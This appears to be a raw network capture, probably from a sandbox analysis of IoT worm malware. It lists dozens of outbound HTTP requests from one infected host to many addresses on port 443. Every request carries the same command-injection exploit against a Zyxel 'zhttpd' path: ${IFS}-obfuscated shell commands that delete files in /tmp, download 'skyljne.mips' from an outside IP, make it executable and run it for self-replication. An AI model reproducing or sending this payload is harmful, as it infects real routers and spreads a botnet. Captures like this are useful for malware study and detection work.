                                                Jan 12, 2024 18:16:37.795579910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8216192.168.2.2345688178.237.5.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795615911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8217192.168.2.234977849.65.54.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795650959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8218192.168.2.2346646128.22.137.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795703888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8219192.168.2.233642635.31.126.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795743942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8220192.168.2.233943418.251.133.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795845032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8221192.168.2.2339634156.43.6.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795849085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8222192.168.2.234628054.16.100.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795849085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8223192.168.2.235920668.202.193.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.799746990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8224192.168.2.2336692126.229.56.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.799792051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8225192.168.2.2351226122.184.241.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.799839020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8226192.168.2.2343094148.85.201.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.799906969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8227192.168.2.2340038107.187.145.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.799911976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8228192.168.2.2345168202.70.74.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.799962044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8229192.168.2.2357518135.83.89.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.799992085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8230192.168.2.2360790168.7.202.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.800029993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8231192.168.2.2350242101.251.208.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.800054073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8232192.168.2.235366819.51.204.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.800115108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8233192.168.2.235522253.250.171.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.812266111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8234192.168.2.2353146200.255.243.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.812330008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8235192.168.2.235976420.190.123.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.812382936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8236192.168.2.233426619.216.230.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.812423944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8237192.168.2.2358464178.175.115.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.812490940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8238192.168.2.2358474154.233.175.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.812525034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8239192.168.2.2336866188.225.253.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.812592983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8240192.168.2.2334414104.130.37.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.812663078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8241192.168.2.235952896.159.245.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.812737942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8242192.168.2.234530071.67.180.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.812792063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8243192.168.2.2340764140.130.177.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.812846899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8244192.168.2.234336071.171.242.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.812877893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8245192.168.2.233278032.193.13.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.812946081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8246192.168.2.236074671.3.3.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813030005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8247192.168.2.2346734203.124.25.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813051939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8248192.168.2.235209473.202.149.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813106060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8249192.168.2.2336872138.185.128.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813147068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8250192.168.2.2357470223.35.18.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813215017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8251192.168.2.235243048.1.83.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813263893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8252192.168.2.233899075.252.150.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813328981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8253192.168.2.234577027.229.159.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813385963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8254192.168.2.2340194155.34.6.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813436031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8255192.168.2.2358962188.62.69.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813492060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8256192.168.2.236091892.35.138.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813545942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8257192.168.2.2360146166.78.125.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813606024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8258192.168.2.2358402212.19.249.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813663960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8259192.168.2.235594075.250.205.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813730955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8260192.168.2.2360870164.254.81.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813765049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8261192.168.2.234073696.104.231.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813838959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8262192.168.2.2340948141.149.92.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813893080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8263192.168.2.2359276210.251.220.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813929081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8264192.168.2.235890253.26.245.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.813977957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8265192.168.2.236008435.42.248.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814037085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8266192.168.2.2338228107.229.71.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814100027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8267192.168.2.2359248179.115.176.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814167023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8268192.168.2.2352986122.21.159.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814207077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8269192.168.2.2350940188.182.213.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814280033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8270192.168.2.2335014169.221.71.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814335108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8271192.168.2.234091259.67.140.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814414978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8272192.168.2.23520448.85.252.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814471006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8273192.168.2.2344088187.110.167.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814516068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8274192.168.2.235188696.156.134.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814588070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8275192.168.2.235044225.221.22.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814625025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8276192.168.2.233561673.160.45.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814667940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8277192.168.2.235037886.160.27.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814750910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8278192.168.2.2355680129.142.189.145443
                                                TimestampBytes transferredDirectionData
